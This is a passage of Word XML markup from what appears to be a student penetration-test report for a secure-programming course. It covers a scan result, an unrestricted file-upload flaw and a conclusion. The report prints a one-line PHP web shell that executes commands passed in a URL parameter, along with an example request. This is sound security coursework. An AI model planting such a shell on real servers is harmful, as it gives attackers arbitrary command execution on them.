    </w:p>
    <w:p w:rsidR="00A775FC" w:rsidRDefault="00A775FC" w:rsidP="00495A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uniscan report – no vulnerabilities found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A775FC" w:rsidRDefault="004D6EE7" w:rsidP="00A775FC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:467.55pt;height:207.15pt">
            <v:imagedata r:id="rId15" o:title="Uniscan report"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File uploading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The problem with the code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>a malicious file can be added.</w:t>
      </w:r>
      <w:r w:rsidR="00200D71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Further, the content of a uploaded file is not being verified which allows malicious content to be included.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>malicious.php:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>system($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00FA1C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098229B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Once this file has been installed, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">one </w:t>
      </w:r>
      <w:r w:rsidRPr="0098229B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>can enter arbitrary commands to execute using a URL such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495A74" w:rsidRDefault="00495A74" w:rsidP="00495A74">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>http://serveraddress/uploads/malicious.php?cmd=ls%20-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4F72" w:rsidRDefault="00495A74" w:rsidP="002A4F72">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44622029" wp14:editId="0378AB07">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95A74" w:rsidRDefault="002A4F72" w:rsidP="002A4F72">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Result of a command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4F72" w:rsidRDefault="002A4F72" w:rsidP="00437351">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc464415752"/>
      <w:r w:rsidRPr="00E455D7">
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="007640C9" w:rsidRDefault="00F67065" w:rsidP="00134638">
      <w:r>
        <w:t xml:space="preserve">The pen test showed that the </w:t>
      </w:r>
      <w:r w:rsidR="000B316F">
        <w:t xml:space="preserve">cloud </w:t>
      </w:r>
      <w:r w:rsidR="007D6FBA">
        <w:t xml:space="preserve">service is </w:t>
      </w:r>
      <w:r w:rsidR="000B316F">
        <w:t xml:space="preserve">to be very secure in terms of XSS or SQL injection attacks. </w:t>
      </w:r>
      <w:r w:rsidR="007D6FBA">
        <w:t xml:space="preserve">It was not possible to perform a successful attack using the techniques named. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134638" w:rsidRPr="00134638" w:rsidRDefault="000B316F" w:rsidP="00134638">
      <w:r>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="007D6FBA">
        <w:t xml:space="preserve"> the cloud service proved to be very vulnerable to malicious files. </w:t>
      </w:r>
      <w:r w:rsidR="000C3893">
        <w:t xml:space="preserve">Not the content nor the file type </w:t>
      </w:r>
      <w:r w:rsidR="00375C95">
        <w:t xml:space="preserve">of uploaded files are verified for possible attacks. </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00375C95">
        <w:t xml:space="preserve">Hence, attacks were easily performed since no </w:t>
      </w:r>
      <w:r w:rsidR="007640C9">
        <w:t xml:space="preserve">prevention of any kind </w:t>
      </w:r>
      <w:r w:rsidR="00F31F0E">
        <w:t xml:space="preserve">was present. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00134638" w:rsidRPr="00134638" w:rsidSect="00797675">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>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76E" w:rsidRDefault="00F4176E" w:rsidP="00954A2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F4176E" w:rsidRDefault="00F4176E" w:rsidP="00954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5981189"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="004D6EE7">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A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76E" w:rsidRDefault="00F4176E" w:rsidP="00954A2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F4176E" w:rsidRDefault="00F4176E" w:rsidP="00954A2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A2B33" w:rsidRDefault="00DA2B33">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Fontys University of Applied Sciences</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>Pentest</w:t>
    </w:r>
    <w:r w:rsidR="00D071DF">
      <w:t xml:space="preserve">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F7B73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="146A7B58"/>
    <w:lvl w:ilvl="0" w:tplc="676285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7B1202"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F94E2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18FA56CF"/>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92A6836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DCE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C6655B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D71C0E04"/>
    <w:lvl w:ilvl="0" w:tplc="0BA03976">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15B255F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA8246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64B840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671D1E2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7254589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5"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>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jQ0MrIwNLC0NDU1tDRQ0lEKTi0uzszPAykwrAUA+I/M0iwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="003D606B"/>
    <w:rsid w:val="00007760"/>
    <w:rsid w:val="000109CF"/>
    <w:rsid w:val="00045E61"/>
    <w:rsid w:val="0008171F"/>
    <w:rsid w:val="000B252C"/>
    <w:rsid w:val="000B316F"/>
    <w:rsid w:val="000C3893"/>
    <w:rsid w:val="000C7BA1"/>
    <w:rsid w:val="00134638"/>
    <w:rsid w:val="001E7B66"/>
    <w:rsid w:val="0020088D"/>
    <w:rsid w:val="00200D71"/>
    <w:rsid w:val="00283D01"/>
    <w:rsid w:val="002A4F72"/>
    <w:rsid w:val="00375C95"/>
    <w:rsid w:val="003D606B"/>
    <w:rsid w:val="003E1A48"/>
    <w:rsid w:val="00417093"/>
    <w:rsid w:val="00437351"/>
    <w:rsid w:val="0049101D"/>
    <w:rsid w:val="00495A74"/>
    <w:rsid w:val="004A0514"/>
    <w:rsid w:val="004D6EE7"/>
    <w:rsid w:val="004F510E"/>
    <w:rsid w:val="005E6209"/>
    <w:rsid w:val="005F7DED"/>
    <w:rsid w:val="006B5678"/>
    <w:rsid w:val="007640C9"/>
    <w:rsid w:val="00786B0A"/>
    <w:rsid w:val="00793505"/>
    <w:rsid w:val="00797675"/>
    <w:rsid w:val="007D699F"/>
    <w:rsid w:val="007D6FBA"/>
    <w:rsid w:val="00954A2E"/>
    <w:rsid w:val="00A2508C"/>
    <w:rsid w:val="00A6284F"/>
    <w:rsid w:val="00A775FC"/>
    <w:rsid w:val="00AF00F4"/>
    <w:rsid w:val="00B079CD"/>
    <w:rsid w:val="00B160B0"/>
    <w:rsid w:val="00C36DD6"/>
    <w:rsid w:val="00D071DF"/>
    <w:rsid w:val="00D16E64"/>
    <w:rsid w:val="00D25637"/>
    <w:rsid w:val="00D92A2E"/>
    <w:rsid w:val="00DA2B33"/>
    <w:rsid w:val="00E143AF"/>
    <w:rsid w:val="00E41572"/>
    <w:rsid w:val="00E455D7"/>
    <w:rsid w:val="00F14287"/>
    <w:rsid w:val="00F31F0E"/>
    <w:rsid w:val="00F4176E"/>
    <w:rsid w:val="00F67065"/>
    <w:rsid w:val="00FA1C69"/>
    <w:rsid w:val="00FC0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A67F3F1-58EC-4163-B119-C893EDF9D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2A2E"/>
    <w:pPr>
      <w:spacing w:line="256" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004A0514"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="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5A74"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="9"/>
      </w:numPr>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34638"/>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92A2E"/>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34638"/>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34638"/>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34638"/>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34638"/>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34638"/>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semiHidden/>
    <w:rsid w:val="00D92A2E"/>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D92A2E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:locked/>
    <w:rsid w:val="00D92A2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00D92A2E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable7Colorful-Accent51">
    <w:name w:val="Grid Table 7 Colorful - Accent 51"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="52"/>
    <w:rsid w:val="00D92A2E"/>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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B160B0"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004A051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A0514"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004A0514"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00954A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4A2E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00954A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4A2E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00495A74"/>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0B252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134638"/>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134638"/>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3463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34638"/>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3463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3463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0311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4AB83-60FD-4D59-8AA3-EAA9CA263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9</Pages>
  <Words>939</Words>
  <Characters>5354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Pentest Report</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6281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Pentest Report</dc:title>
  <dc:subject>Secure Programming</dc:subject>
  <dc:creator>Radu Alexandru, Raditya Surya Pratama, Georgiana Manolache, Armin Roushan, Jan-Niklas Schneider, Nina O’Driscoll.</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Raditya Surya</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-16T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-16T21:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>